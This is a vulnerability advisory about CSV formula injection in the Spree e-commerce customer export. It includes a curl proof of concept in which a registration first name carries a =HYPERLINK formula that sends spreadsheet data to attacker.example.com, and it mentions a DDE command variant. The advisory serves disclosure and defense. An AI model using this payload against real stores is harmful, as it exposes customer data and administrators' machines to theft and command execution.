CSV injection In spree

Description

Spree: CSV Formula Injection in Customer Export

Summary

CSV formula injection (also known as formula injection or CSV injection) affects customer export. User-controlled values customer names, email addresses, and shipping addresses. When an administrator opens a crafted Export in Microsoft Excel or LibreOffice Calc, formulas embedded in user data execute in the context of the administrator's desktop, potentially exfiltrating data or executing OS commands via DDE (Dynamic Data Exchange).


Details

Affected presenters and fields

Presenter
Path
User-controlled fields

Vulnerable code — customer_presenter.rb (representative example)

# spree/core/app/presenters/spree/csv/customer_presenter.rb:36–53
def call
  csv = [
    customer.first_name,          # ← written verbatim; may contain =HYPERLINK(...)
    customer.last_name,           # ← user-controlled
    customer.email,              
    customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no),
    customer.address&.company,    # ← user-controlled...

PoC

Precondition: A Spree store with public customer registration enabled (default configuration). No special permissions required for the attacker.

Step 1 — Register as a customer with an injected first name

curl -X POST https://store.example.com/api/v3/store/customers \
  -H "Content-Type: application/json" \
  -H "X-Spree-Api-Key: pk_<publishable_api_key>" \
  -d '{
    "email": "[email protected]",
    "password": "password123",
    "password_confirmation": "password123",
    "first_name": "=HYPERLINK(\"http://attacker.example.com/exfil?d=\"&B1,\"Click\")",...

Step 2 — Admin triggers a customer export

curl -X POST https://store.example.com/api/v3/admin/exports \
  -H "Authorization: Bearer <admin_jwt>" \
  -H "Content-Type: application/json" \
  -d '{"type": "Spree::Exports::Customers", "record_selection": "all"}'

Step 3 — Admin polls until ready, then downloads

# Poll for completion
curl https://store.example.com/api/v3/admin/exports/<export_id> \
  -H "Authorization: Bearer <admin_jwt>"

# Download
curl https://store.example.com/api/v3/admin/exports/<export_id>/download \
  -H "Authorization: Bearer <admin_jwt>" \
  -o customers.csv...

Step 4 — Verify injection in the raw CSV (without opening in Excel)

Open customers.csv in a text editor. The first data row will contain:

"=HYPERLINK(""http://attacker.example.com/exfil?d=""&B1,""Click"")","Smith","[email protected]",...

Step 5 — Admin opens customers.csv in Microsoft Excel (Windows)

    Excel warns about external data connections; if the administrator clicks Enable, the HYPERLINK formula fires and sends a GET request to http://attacker.example.com/exfil?d=<B1_value>.

    Cell B1 in the customers export is the Last Name column. Adjacent columns contain email, address, and order total data for all exported customers.

    With the DDE variant (=CMD|...) on older or unpatched Excel versions, a subprocess is launched on the administrator's machine.


Impact

Vulnerability class: CSV / Formula Injection (CWE-1236)

Who is impacted

    Administrators who download and open export files in spreadsheet software are the direct victims. Administrative accounts have access to all store data, payment method configurations, customer PII, and full order history.

Realistic attack chain

Step
Actor
Action
Privilege required

Data at risk

All data visible to the administrator in the spreadsheet at the time of opening, including:

    All exported customer emails, names, addresses, phone numbers

    Order totals and purchase history

    Any other columns in the same export file

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions